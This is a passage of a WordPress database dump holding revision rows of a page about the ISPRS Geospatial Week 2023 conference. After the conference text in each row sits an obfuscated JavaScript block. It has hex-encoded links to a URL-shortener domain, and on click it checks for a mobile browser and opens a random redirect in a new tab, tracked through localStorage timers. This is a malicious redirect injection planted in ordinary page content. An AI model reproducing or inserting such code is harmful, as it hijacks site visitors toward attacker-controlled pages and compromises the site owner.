_0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','The ISPRS Geospatial Week (GSW)','','inherit','closed','closed','','2631-revision-v1','','','2022-10-09 00:42:58','2022-10-09 00:42:58','',2631,'https://gsw2023.com/?p=2635',0,'revision','',0),
(2636,1,'2022-10-09 00:43:34','2022-10-09 00:43:34','[vc_row][vc_column][bsf-info-box icon_size=\"32\"]\r\n<h5 style=\"text-align: justify; color: black;\"><strong>Science, Technology and Maritime Transport acting as local organiser and host The ISPRS Geospatial Week (GSW) is a combination of workshops organised by about 30 ISPRS Working Groups active in areas of interest of ISPRS. It is convened by the Arab Academy for, and led by Prof. Naser El-Sheimy as GSW Director.</strong></h5>\r\n<h5 style=\"text-align: justify; color: black;\"><strong>The ISPRS Geospatial Week is held biennially in odd years. The GSW 2023 is the fifth edition, after Antalya 2013, Montpellier 2015, Wuhan 2017, and Enschede 2019.</strong></h5>\r\n[/bsf-info-box][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','The ISPRS Geospatial Week (GSW)','','inherit','closed','closed','','2631-revision-v1','','','2022-10-09 00:43:34','2022-10-09 00:43:34','',2631,'https://gsw2023.com/?p=2636',0,'revision','',0),
(2637,1,'2022-10-09 00:47:38','2022-10-09 00:47:38','[vc_row][vc_column][bsf-info-box icon_size=\"32\"]\r\n<h5 style=\"text-align: justify; color: black;\"><strong>Science, Technology and Maritime Transport acting as local organiser and host The ISPRS Geospatial Week (GSW) is a combination of workshops organised by about 30 ISPRS Working Groups active in areas of interest of ISPRS. It is convened by the Arab Academy for, and led by Prof. Naser El-Sheimy as GSW Director.</strong></h5>\r\n<h5 style=\"text-align: justify; color: black;\"><strong>The ISPRS Geospatial Week is held biennially in odd years. The GSW 2023 is the fifth edition, after Antalya 2013, Montpellier 2015, Wuhan 2017, and Enschede 2019.</strong></h5>\r\n<h5 style=\"text-align: justify; color: red;\"><strong>The ISPRS Geospatial Week\'s general goals are to:</strong></h5>\r\n<h5 class=\"gap-10\"></h5>\r\n<ul class=\"nospace\">\r\n 	<li>\r\n<h5 style=\"text-align: justify; color: black;\"><strong>Increase the possibility of communication between the different workshop communities within ISPRS and beyond;</strong></h5>\r\n</li>\r\n 	<li>\r\n<h5 style=\"text-align: justify; color: black;\"><strong>Increase the continuous visibility of ISPRS on a yearly basis, together with the Congress and the Commission Symposia, thus leading to larger impact for ISPRS activities;</strong></h5>\r\n</li>\r\n 	<li>\r\n<h5 style=\"text-align: justify; color: black;\"><strong>Gives Sustaining Members a more attractive opportunity to participate in ISPRS events.</strong></h5>\r\n</li>\r\n</ul>\r\n[/bsf-info-box][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( 